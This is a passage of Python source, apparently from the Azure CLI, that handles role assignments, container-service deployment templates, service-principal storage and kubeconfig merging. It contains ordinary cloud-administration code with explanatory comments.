value=0.1 * x, total_val=1.0)
try:
# TODO: break this out into a shared utility library
create_role_assignment(
cmd, role, service_principal_msi_id, is_service_principal, scope=scope)
break
except CloudError as ex:
if ex.message == 'The role assignment already exists.':
break
logger.info(ex.message)
except CLIError as ex:
logger.warning(str(ex))
except Exception as ex: # pylint: disable=broad-except
logger.error(str(ex))
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role propagation done', value=1.0, total_val=1.0)
logger.info('AAD role propagation done')
return True
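# Illustrative note on the retry schedule above: with the default delay of 2 seconds the
# loop sleeps delay + delay * x seconds after each failed attempt for x in 0..9, i.e.
#   sum(2 + 2 * x for x in range(10)) == 110
# seconds of cumulative wait before giving up on AAD propagation.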
def delete_role_assignments(cli_ctx, ids=None, assignee=None, role=None, resource_group_name=None,
scope=None, include_inherited=False, yes=None, is_service_principal=True):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
ids = ids or []
if ids:
if assignee or role or resource_group_name or scope or include_inherited:
raise CLIError(
'When assignment ids are used, other parameter values are not required')
for i in ids:
assignments_client.delete_by_id(i)
return
    if not any([ids, assignee, role, resource_group_name, scope, yes]):
msg = 'This will delete all role assignments under the subscription. Are you sure?'
if not prompt_y_n(msg, default="n"):
return
scope = _build_role_scope(resource_group_name, scope,
assignments_client.config.subscription_id)
assignments = _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited,
include_groups=False, is_service_principal=is_service_principal)
if assignments:
for a in assignments:
assignments_client.delete_by_id(a.id)
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None, is_service_principal=True):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete',
value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope,
is_service_principal=is_service_principal)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited, include_groups,
is_service_principal=True):
assignee_object_id = None
if assignee:
if is_service_principal:
assignee_object_id = _resolve_object_id(cli_ctx, assignee)
else:
assignee_object_id = assignee
# always use "scope" if provided, so we can get assignments beyond subscription e.g. management groups
if scope:
assignments = list(assignments_client.list_for_scope(
scope=scope, filter='atScope()'))
elif assignee_object_id:
if include_groups:
f = "assignedTo('{}')".format(assignee_object_id)
else:
f = "principalId eq '{}'".format(assignee_object_id)
assignments = list(assignments_client.list(filter=f))
else:
assignments = list(assignments_client.list())
if assignments:
assignments = [a for a in assignments if (
not scope or
include_inherited and re.match(_get_role_property(a, 'scope'), scope, re.I) or
_get_role_property(a, 'scope').lower() == scope.lower()
)]
if role:
role_id = _resolve_role_id(role, scope, definitions_client)
assignments = [i for i in assignments if _get_role_property(
i, 'role_definition_id') == role_id]
if assignee_object_id:
assignments = [i for i in assignments if _get_role_property(
i, 'principal_id') == assignee_object_id]
return assignments
def _get_role_property(obj, property_name):
if isinstance(obj, dict):
return obj[property_name]
return getattr(obj, property_name)
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
# Use subscription id to provide uniqueness and prevent DNS name clashes
name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
if not name_part[0].isalpha():
name_part = (str('a') + name_part)[0:10]
resource_group_part = re.sub(
'[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
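# Worked example (illustrative values): special characters are stripped, the name part is
# forced to start with a letter, and the first six characters of the subscription id add
# uniqueness, e.g.
#   _get_default_dns_prefix("myCluster!", "my_resource-group", "0123456789abcdef")
#   returns "myCluster-myresource-group-012345"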
def list_acs_locations(cmd, client):
return {
"productionRegions": regions_in_prod,
"previewRegions": regions_in_preview
}
def _generate_windows_profile(windows, admin_username, admin_password):
if windows:
if not admin_password:
raise CLIError('--admin-password is required.')
if len(admin_password) < 6:
raise CLIError('--admin-password must be at least 6 characters')
windows_profile = {
"adminUsername": admin_username,
"adminPassword": admin_password,
}
return windows_profile
return None
def _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
master_vm_size, master_osdisk_size, master_vnet_subnet_id,
master_first_consecutive_static_ip, master_storage_profile):
master_pool_profile = {}
default_master_pool_profile = {
"count": int(master_count),
"dnsPrefix": dns_name_prefix + 'mgmt',
}
if api_version == "2017-07-01":
default_master_pool_profile = _update_dict(default_master_pool_profile, {
"count": int(master_count),
"dnsPrefix": dns_name_prefix + 'mgmt',
"vmSize": master_vm_size,
"osDiskSizeGB": int(master_osdisk_size),
"vnetSubnetID": master_vnet_subnet_id,
"firstConsecutiveStaticIP": master_first_consecutive_static_ip,
"storageProfile": master_storage_profile,
})
if not master_profile:
master_pool_profile = default_master_pool_profile
else:
master_pool_profile = _update_dict(
default_master_pool_profile, master_profile)
return master_pool_profile
def _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
agent_ports, agent_storage_profile):
agent_pool_profiles = []
default_agent_pool_profile = {
"count": int(agent_count),
"vmSize": agent_vm_size,
"osType": os_type,
"dnsPrefix": dns_name_prefix + 'agent',
}
if api_version == "2017-07-01":
default_agent_pool_profile = _update_dict(default_agent_pool_profile, {
"count": int(agent_count),
"vmSize": agent_vm_size,
"osDiskSizeGB": int(agent_osdisk_size),
"osType": os_type,
"dnsPrefix": dns_name_prefix + 'agent',
"vnetSubnetID": agent_vnet_subnet_id,
"ports": agent_ports,
"storageProfile": agent_storage_profile,
})
if agent_profiles is None:
agent_pool_profiles.append(_update_dict(
default_agent_pool_profile, {"name": "agentpool0"}))
else:
# override agentPoolProfiles by using the passed in agent_profiles
for idx, ap in enumerate(agent_profiles):
# if the user specified dnsPrefix, we honor that
# otherwise, we use the idx to avoid duplicate dns name
a = _update_dict(
{"dnsPrefix": dns_name_prefix + 'agent' + str(idx)}, ap)
agent_pool_profiles.append(
_update_dict(default_agent_pool_profile, a))
return agent_pool_profiles
def _generate_outputs(name, orchestrator_type, admin_username):
# define outputs
outputs = {
"masterFQDN": {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).masterProfile.fqdn]".format(name) # pylint: disable=line-too-long
},
"sshMaster0": {
"type": "string",
"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 22')]".format(admin_username, name) # pylint: disable=line-too-long
},
}
if orchestrator_type.lower() != "kubernetes":
outputs["agentFQDN"] = {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).agentPoolProfiles[0].fqdn]".format(name) # pylint: disable=line-too-long
}
# override sshMaster0 for non-kubernetes scenarios
outputs["sshMaster0"] = {
"type": "string",
"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 2200')]".format(admin_username, name) # pylint: disable=line-too-long
}
return outputs
def _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
agent_pool_profiles, ssh_key_value, admin_username, windows_profile):
properties = {
"orchestratorProfile": {
"orchestratorType": orchestrator_type,
},
"masterProfile": master_pool_profile,
"agentPoolProfiles": agent_pool_profiles,
"linuxProfile": {
"ssh": {
"publicKeys": [
{
"keyData": ssh_key_value
}
]
},
"adminUsername": admin_username
},
}
if api_version == "2017-07-01":
properties["orchestratorProfile"]["orchestratorVersion"] = orchestrator_version
if windows_profile is not None:
properties["windowsProfile"] = windows_profile
return properties
# pylint: disable=too-many-locals
def acs_create(cmd, client, resource_group_name, deployment_name, name, ssh_key_value, dns_name_prefix=None,
location=None, admin_username="azureuser", api_version=None, master_profile=None,
master_vm_size="Standard_D2_v2", master_osdisk_size=0, master_count=1, master_vnet_subnet_id="",
master_first_consecutive_static_ip="10.240.255.5", master_storage_profile="",
agent_profiles=None, agent_vm_size="Standard_D2_v2", agent_osdisk_size=0,
agent_count=3, agent_vnet_subnet_id="", agent_ports=None, agent_storage_profile="",
orchestrator_type="DCOS", orchestrator_version="", service_principal=None, client_secret=None, tags=None,
windows=False, admin_password="", generate_ssh_keys=False, # pylint: disable=unused-argument
validate=False, no_wait=False):
"""Create a new Acs.
:param resource_group_name: The name of the resource group. The name
is case insensitive.
:type resource_group_name: str
:param deployment_name: The name of the deployment.
:type deployment_name: str
:param dns_name_prefix: Sets the Domain name prefix for the cluster.
The concatenation of the domain name and the regionalized DNS zone
make up the fully qualified domain name associated with the public
IP address.
:type dns_name_prefix: str
:param name: Resource name for the container service.
:type name: str
:param ssh_key_value: Configure all linux machines with the SSH RSA
public key string. Your key should include three parts, for example
    'ssh-rsa AAAAB...snip...UcyupgH azureuser@linuxvm'.
:type ssh_key_value: str
:param content_version: If included it must match the ContentVersion
in the template.
:type content_version: str
:param admin_username: User name for the Linux Virtual Machines.
:type admin_username: str
:param api_version: ACS API version to use
:type api_version: str
:param master_profile: MasterProfile used to describe master pool
:type master_profile: dict
:param master_vm_size: The size of master pool Virtual Machine
:type master_vm_size: str
:param master_osdisk_size: The osDisk size in GB of master pool Virtual Machine
:type master_osdisk_size: int
:param master_count: The number of masters for the cluster.
:type master_count: int
:param master_vnet_subnet_id: The vnet subnet id for master pool
:type master_vnet_subnet_id: str
:param master_storage_profile: The storage profile used for master pool.
Possible value could be StorageAccount, ManagedDisk.
:type master_storage_profile: str
:param agent_profiles: AgentPoolProfiles used to describe agent pools
:type agent_profiles: dict
:param agent_vm_size: The size of the Virtual Machine.
:type agent_vm_size: str
:param agent_osdisk_size: The osDisk size in GB of agent pool Virtual Machine
:type agent_osdisk_size: int
:param agent_vnet_subnet_id: The vnet subnet id for master pool
:type agent_vnet_subnet_id: str
:param agent_ports: the ports exposed on the agent pool
:type agent_ports: list
:param agent_storage_profile: The storage profile used for agent pool.
Possible value could be StorageAccount, ManagedDisk.
:type agent_storage_profile: str
:param location: Location for VM resources.
:type location: str
:param orchestrator_type: The type of orchestrator used to manage the
applications on the cluster.
:type orchestrator_type: str or :class:`orchestratorType
<Default.models.orchestratorType>`
:param tags: Tags object.
:type tags: object
:param windows: If true, the cluster will be built for running Windows container.
:type windows: bool
    :param admin_password: The administration password for Windows nodes. Only available if --windows=true
:type admin_password: str
:param bool raw: returns the direct response alongside the
deserialized response
:rtype:
:class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
instance that returns :class:`DeploymentExtended
<Default.models.DeploymentExtended>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
if ssh_key_value is not None and not is_valid_ssh_rsa_public_key(ssh_key_value):
raise CLIError(
'Provided ssh key ({}) is invalid or non-existent'.format(ssh_key_value))
subscription_id = get_subscription_id(cmd.cli_ctx)
if not dns_name_prefix:
dns_name_prefix = _get_default_dns_prefix(
name, resource_group_name, subscription_id)
rg_location = get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
    # if api-version is not specified, or the specified version is not supported,
    # override it based on location
if api_version is None or api_version not in ["2017-01-31", "2017-07-01"]:
if location in regions_in_preview:
api_version = "2017-07-01" # 2017-07-01 supported in the preview locations
else:
api_version = "2017-01-31" # 2017-01-31 applied to other locations
if orchestrator_type.lower() == 'kubernetes':
principal_obj = _ensure_service_principal(cmd.cli_ctx, service_principal, client_secret, subscription_id,
dns_name_prefix, location, name)
client_secret = principal_obj.get("client_secret")
service_principal = principal_obj.get("service_principal")
elif windows:
raise CLIError('--windows is only supported for Kubernetes clusters')
    # set location if empty
if not location:
location = '[resourceGroup().location]'
# set os_type
os_type = 'Linux'
if windows:
os_type = 'Windows'
    # set agent_ports if empty
if not agent_ports:
agent_ports = []
# get windows_profile
windows_profile = _generate_windows_profile(
windows, admin_username, admin_password)
# The resources.properties fields should match with ContainerServices' api model
master_pool_profile = _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
master_vm_size, master_osdisk_size, master_vnet_subnet_id,
master_first_consecutive_static_ip, master_storage_profile)
agent_pool_profiles = _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
agent_ports, agent_storage_profile)
outputs = _generate_outputs(name, orchestrator_type, admin_username)
properties = _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
agent_pool_profiles, ssh_key_value, admin_username, windows_profile)
resource = {
"apiVersion": api_version,
"location": location,
"type": "Microsoft.ContainerService/containerServices",
"name": name,
"tags": tags,
"properties": properties,
}
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"resources": [
resource,
],
"outputs": outputs,
}
params = {}
if service_principal is not None and client_secret is not None:
properties["servicePrincipalProfile"] = {
"clientId": service_principal,
"secret": "[parameters('clientSecret')]",
}
template["parameters"] = {
"clientSecret": {
"type": "secureString",
"metadata": {
"description": "The client secret for the service principal"
}
}
}
params = {
"clientSecret": {
"value": client_secret
}
}
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
return _invoke_deployment(cmd, resource_group_name, deployment_name,
template, params, validate, no_wait)
except CloudError as ex:
retry_exception = ex
if 'is not valid according to the validation procedure' in ex.message or \
'The credentials in ServicePrincipalProfile were invalid' in ex.message or \
'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
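# A minimal sketch (not executed; values are hypothetical placeholders) of the ARM deployment that
# acs_create assembles above. When a service principal and client secret are supplied, the secret is
# passed as a secureString deployment parameter instead of being embedded in the template body:
#
#   template = {
#       "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
#       "contentVersion": "1.0.0.0",
#       "resources": [{
#           "apiVersion": "2017-07-01",
#           "location": "westus2",
#           "type": "Microsoft.ContainerService/containerServices",
#           "name": "my-acs",
#           "tags": None,
#           "properties": {...},
#       }],
#       "outputs": {...},
#       "parameters": {"clientSecret": {"type": "secureString", ...}},
#   }
#   params = {"clientSecret": {"value": "<client secret>"}}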
def store_acs_service_principal(subscription_id, client_secret, service_principal,
file_name='acsServicePrincipal.json'):
obj = {}
if client_secret:
obj['client_secret'] = client_secret
if service_principal:
obj['service_principal'] = service_principal
config_path = os.path.join(get_config_dir(), file_name)
full_config = load_service_principals(config_path=config_path)
if not full_config:
full_config = {}
full_config[subscription_id] = obj
with os.fdopen(os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600),
'w+') as spFile:
json.dump(full_config, spFile)
def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'):
config_path = os.path.join(get_config_dir(), file_name)
config = load_service_principals(config_path)
if not config:
return None
return config.get(subscription_id)
def load_service_principals(config_path):
if not os.path.exists(config_path):
return None
fd = os.open(config_path, os.O_RDONLY)
try:
with os.fdopen(fd) as f:
return shell_safe_json_parse(f.read())
except: # pylint: disable=bare-except
return None
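# A minimal sketch of the acsServicePrincipal.json layout written by store_acs_service_principal and
# read back by load_acs_service_principal (the subscription id and values below are hypothetical):
#
#   {
#       "00000000-0000-0000-0000-000000000000": {
#           "client_secret": "<secret>",
#           "service_principal": "<app id>"
#       }
#   }
#
# The file lives at os.path.join(get_config_dir(), 'acsServicePrincipal.json') and is created with
# 0o600 permissions so that only the owner can read or write it.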
def _invoke_deployment(cmd, resource_group_name, deployment_name, template, parameters, validate, no_wait,
subscription_id=None):
DeploymentProperties = cmd.get_models(
'DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
properties = DeploymentProperties(
template=template, parameters=parameters, mode='incremental')
smc = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES,
subscription_id=subscription_id).deployments
Deployment = cmd.get_models(
'Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate:
logger.info('==== BEGIN TEMPLATE ====')
logger.info(json.dumps(template, indent=2))
logger.info('==== END TEMPLATE ====')
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
validation_poller = smc.begin_validate(
resource_group_name, deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(validation_poller)
return smc.validate(resource_group_name, deployment_name, deployment)
return sdk_no_wait(no_wait, smc.begin_create_or_update, resource_group_name, deployment_name, deployment)
def k8s_get_credentials(cmd, client, name, resource_group_name,
path=os.path.join(os.path.expanduser(
'~'), '.kube', 'config'),
ssh_key_file=None,
overwrite_existing=False):
"""Download and install kubectl credentials from the cluster master
:param name: The name of the cluster.
:type name: str
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param path: Where to install the kubectl config file
:type path: str
:param ssh_key_file: Path to an SSH key file to use
:type ssh_key_file: str
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_k8s_get_credentials_internal(
name, acs_info, path, ssh_key_file, overwrite_existing)
def _k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing):
if ssh_key_file is not None and not os.path.isfile(ssh_key_file):
raise CLIError(
'Private key file {} does not exist'.format(ssh_key_file))
dns_prefix = acs_info.master_profile.dns_prefix # pylint: disable=no-member
location = acs_info.location # pylint: disable=no-member
user = acs_info.linux_profile.admin_username # pylint: disable=no-member
_mkdir_p(os.path.dirname(path))
path_candidate = path
ix = 0
while os.path.exists(path_candidate):
ix += 1
path_candidate = '{}-{}-{}'.format(path, name, ix)
# TODO: this only works for public cloud, need other casing for national clouds
acs_client.secure_copy(user, '{}.{}.cloudapp.azure.com'.format(dns_prefix, location),
'.kube/config', path_candidate, key_filename=ssh_key_file)
# merge things
if path_candidate != path:
try:
merge_kubernetes_configurations(
path, path_candidate, overwrite_existing)
except yaml.YAMLError as exc:
logger.warning(
'Failed to merge credentials to kube config file: %s', exc)
logger.warning(
'The credentials have been saved to %s', path_candidate)
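# Sketch of the collision handling above (paths and cluster name are hypothetical): when the target
# kubeconfig already exists, the credentials are copied to a numbered candidate path and then merged
# back into the original file:
#
#   path           = '/home/user/.kube/config'
#   path_candidate = '/home/user/.kube/config-mycluster-1'
#
#   merge_kubernetes_configurations(path, path_candidate, overwrite_existing)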
def _handle_merge(existing, addition, key, replace):
if not addition.get(key, False):
return
if not existing.get(key):
existing[key] = addition[key]
return
for i in addition[key]:
for j in existing[key]:
if not i.get('name', False) or not j.get('name', False):
continue
if i['name'] == j['name']:
if replace or i == j:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?'
overwrite = False
try:
overwrite = prompt_y_n(msg.format(i['name']))
except NoTTYException:
pass
if overwrite:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in {} in your kubeconfig file.'
raise CLIError(msg.format(i['name'], key))
existing[key].append(i)
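# Minimal sketch of _handle_merge semantics (the data below is hypothetical):
#
#   existing = {'clusters': [{'name': 'a', 'cluster': {'server': 'https://old'}}]}
#   addition = {'clusters': [{'name': 'a', 'cluster': {'server': 'https://new'}},
#                            {'name': 'b', 'cluster': {'server': 'https://b'}}]}
#   _handle_merge(existing, addition, 'clusters', replace=True)
#   # existing['clusters'] now holds the new 'a' entry plus 'b'. With replace=False and a differing
#   # 'a', the user is prompted to overwrite; declining (or having no TTY) raises a CLIError.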
def load_kubernetes_configuration(filename):
try:
with open(filename) as stream:
return yaml.safe_load(stream)
except (IOError, OSError) as ex:
if getattr(ex, 'errno', 0) == errno.ENOENT:
raise CLIError('{} does not exist'.format(filename))
raise
except (yaml.parser.ParserError, UnicodeDecodeError) as ex:
raise CLIError('Error parsing {} ({})'.format(filename, str(ex)))
def merge_kubernetes_configurations(existing_file, addition_file, replace, context_name=None):
existing = load_kubernetes_configuration(existing_file)
addition = load_kubernetes_configuration(addition_file)
    if addition is None:
        raise CLIError(
            'failed to load additional configuration from {}'.format(addition_file))
    if context_name is not None:
        addition['contexts'][0]['name'] = context_name
        addition['contexts'][0]['context']['cluster'] = context_name
        addition['clusters'][0]['name'] = context_name
        addition['current-context'] = context_name
    # rename the admin context so it doesn't overwrite the user context
    for ctx in addition.get('contexts', []):
        try:
            if ctx['context']['user'].startswith('clusterAdmin'):
                admin_name = ctx['name'] + '-admin'
                addition['current-context'] = ctx['name'] = admin_name
                break
        except (KeyError, TypeError):
            continue
if existing is None:
existing = addition
else:
_handle_merge(existing, addition, 'clusters', replace)
_handle_merge(existing, addition, 'users', replace)
_handle_merge(existing, addition, 'contexts', replace)
existing['current-context'] = addition['current-context']
# check that ~/.kube/config is only read- and writable by its owner
if platform.system() != 'Windows':
existing_file_perms = "{:o}".format(
stat.S_IMODE(os.lstat(existing_file).st_mode))
if not existing_file_perms.endswith('600'):
logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.',
existing_file, existing_file_perms)
with open(existing_file, 'w+') as stream:
yaml.safe_dump(existing, stream, default_flow_style=False)
current_context = addition.get('current-context', 'UNKNOWN')
msg = 'Merged "{}" as current context in {}'.format(
current_context, existing_file)
logger.warning(msg)
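# Sketch of the context_name override above (names are hypothetical): passing context_name='staging'
# renames the incoming kubeconfig's first context and cluster to 'staging' and makes it the
# current-context, while contexts whose user starts with 'clusterAdmin' are renamed '<context>-admin'
# so they do not clobber the user context:
#
#   merge_kubernetes_configurations('~/.kube/config', '/tmp/new-config', replace=False,
#                                   context_name='staging')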
def _get_host_name(acs_info):
"""
Gets the FQDN from the acs_info object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info is None:
raise CLIError('Missing acs_info')
if acs_info.master_profile is None:
raise CLIError('Missing master_profile')
if acs_info.master_profile.fqdn is None:
raise CLIError('Missing fqdn')
return acs_info.master_profile.fqdn
def _get_username(acs_info):
"""
Gets the admin user name from the Linux profile of the ContainerService object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info.linux_profile is not None:
return acs_info.linux_profile.admin_username
return None
def _get_acs_info(cli_ctx, name, resource_group_name):
"""
Gets the ContainerService object from Azure REST API.
:param name: ACS resource name
:type name: String
:param resource_group_name: Resource group name
:type resource_group_name: String
"""
container_services = cf_container_services(cli_ctx, None)
return container_services.get(resource_group_name, name)
def _rand_str(n):
"""
Gets a random string
"""
choices = string.ascii_lowercase + string.digits
return ''.join(random.SystemRandom().choice(choices) for _ in range(n))
def _mkdir_p(path):
# http://stackoverflow.com/a/600612
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def update_acs(cmd, client, resource_group_name, container_service_name, new_agent_count):
instance = client.get(resource_group_name, container_service_name)
instance.agent_pool_profiles[0].count = new_agent_count # pylint: disable=no-member
# null out the service principal because otherwise validation complains
if instance.orchestrator_profile.orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes:
instance.service_principal_profile = None
# null out the windows profile so that validation doesn't complain about not having the admin password
instance.windows_profile = None
return client.begin_create_or_update(resource_group_name, container_service_name, instance)
def list_container_services(cmd, client, resource_group_name=None):
''' List Container Services. '''
svc_list = client.list_by_resource_group(resource_group_name=resource_group_name) \
if resource_group_name else client.list()
return list(svc_list)
def show_service_principal(client, identifier):
object_id = _resolve_service_principal(client, identifier)
return client.get(object_id)
def _resolve_service_principal(client, identifier):
# todo: confirm with graph team that a service principal name must be unique
result = list(client.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(identifier)))
if result:
return result[0].object_id
try:
uuid.UUID(identifier)
return identifier # assume an object id
except ValueError:
raise CLIError(
"service principal '{}' doesn't exist".format(identifier))
def create_application(client, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None, required_resource_accesses=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password, key_value, key_type,
key_usage, start_date, end_date)
app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
display_name=display_name,
identifier_uris=identifier_uris,
homepage=homepage,
reply_urls=reply_urls,
key_credentials=key_creds,
password_credentials=password_creds,
required_resource_access=required_resource_accesses)
try:
result = client.create(app_create_param, raw=True)
return result.output, result.response.headers["ocp-aad-session-key"]
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def update_application(client, object_id, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None, required_resource_accesses=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password, key_value, key_type,
key_usage, start_date, end_date)
try:
if key_creds:
client.update_key_credentials(object_id, key_creds)
if password_creds:
client.update_password_credentials(object_id, password_creds)
if reply_urls:
client.patch(object_id, ApplicationUpdateParameters(
reply_urls=reply_urls))
return
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def _build_application_creds(password=None, key_value=None, key_type=None,
key_usage=None, start_date=None, end_date=None):
if password and key_value:
raise CLIError(
'specify either --password or --key-value, but not both.')
if not start_date:
start_date = datetime.datetime.utcnow()
elif isinstance(start_date, str):
start_date = dateutil.parser.parse(start_date)
if not end_date:
end_date = start_date + relativedelta(years=1)
elif isinstance(end_date, str):
end_date = dateutil.parser.parse(end_date)
key_type = key_type or 'AsymmetricX509Cert'
key_usage = key_usage or 'Verify'
password_creds = None
key_creds = None
if password:
password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
key_id=str(uuid.uuid4()), value=password)]
elif key_value:
key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
return (password_creds, key_creds)
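# Sketch of the credential defaults above (the password is hypothetical): with no explicit dates the
# credential is valid for one year from utcnow(), and key credentials default to
# type='AsymmetricX509Cert' with usage='Verify':
#
#   password_creds, key_creds = _build_application_creds(password='hunter2')
#   # -> ([PasswordCredential(start_date=<utcnow>, end_date=<utcnow + 1 year>,
#   #                         key_id=<uuid4>, value='hunter2')], None)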
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
if rbac_client is None:
rbac_client = get_graph_rbac_management_client(cli_ctx)
if resolve_app:
try:
uuid.UUID(identifier)
result = list(rbac_client.applications.list(
filter="appId eq '{}'".format(identifier)))
except ValueError:
result = list(rbac_client.applications.list(
filter="identifierUris/any(s:s eq '{}')".format(identifier)))
if not result: # assume we get an object id
result = [rbac_client.applications.get(identifier)]
app_id = result[0].app_id
else:
app_id = identifier
return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
def create_role_assignment(cmd, role, assignee, is_service_principal, resource_group_name=None, scope=None):
return _create_role_assignment(cmd,
role, assignee, resource_group_name,
scope, resolve_assignee=is_service_principal)
def _create_role_assignment(cmd, role, assignee,
resource_group_name=None, scope=None, resolve_assignee=True):
from azure.cli.core.profiles import get_sdk
factory = get_auth_management_client(cmd.cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
scope = _build_role_scope(
resource_group_name, scope, assignments_client.config.subscription_id)
role_id = _resolve_role_id(role, scope, definitions_client)
    # If the cluster has a service principal, resolve its client id to get the object id;
    # otherwise use the MSI object id.
object_id = assignee
if resolve_assignee:
from azure.graphrbac.models import GraphErrorException
error_msg = "Failed to resolve service principal object ID: "
try:
object_id = _resolve_object_id(cmd.cli_ctx, assignee)
except GraphErrorException as ex:
if ex.response is not None:
error_code = getattr(ex.response, "status_code", None)
error_reason = getattr(ex.response, "reason", None)
internal_error = ""
if error_code:
internal_error += str(error_code)
if error_reason:
if internal_error:
internal_error += " - "
internal_error += str(error_reason)
if internal_error:
error_msg += "({}) ".format(internal_error)
error_msg += ex.message
# this should be UserFault or ServiceError, but it is meaningless to distinguish them here
raise CLIError(error_msg)
        except Exception as ex:  # pylint: disable=broad-except
raise CLIError(error_msg + str(ex))
assignment_name = uuid.uuid4()
custom_headers = None
RoleAssignmentCreateParameters = get_sdk(cmd.cli_ctx, ResourceType.MGMT_AUTHORIZATION,
'RoleAssignmentCreateParameters', mod='models',
operation_group='role_assignments')
if cmd.supported_api_version(min_api='2018-01-01-preview', resource_type=ResourceType.MGMT_AUTHORIZATION):
parameters = RoleAssignmentCreateParameters(
role_definition_id=role_id, principal_id=object_id)
return assignments_client.create(scope, assignment_name, parameters, custom_headers=custom_headers)
RoleAssignmentProperties = get_sdk(cmd.cli_ctx, ResourceType.MGMT_AUTHORIZATION,
'RoleAssignmentProperties', mod='models',
operation_group='role_assignments')
properties = RoleAssignmentProperties(role_definition_id=role_id, principal_id=object_id)
return assignments_client.create(scope, assignment_name, properties, custom_headers=custom_headers)
def _build_role_scope(resource_group_name, scope, subscription_id):
subscription_scope = '/subscriptions/' + subscription_id
if scope:
if resource_group_name:
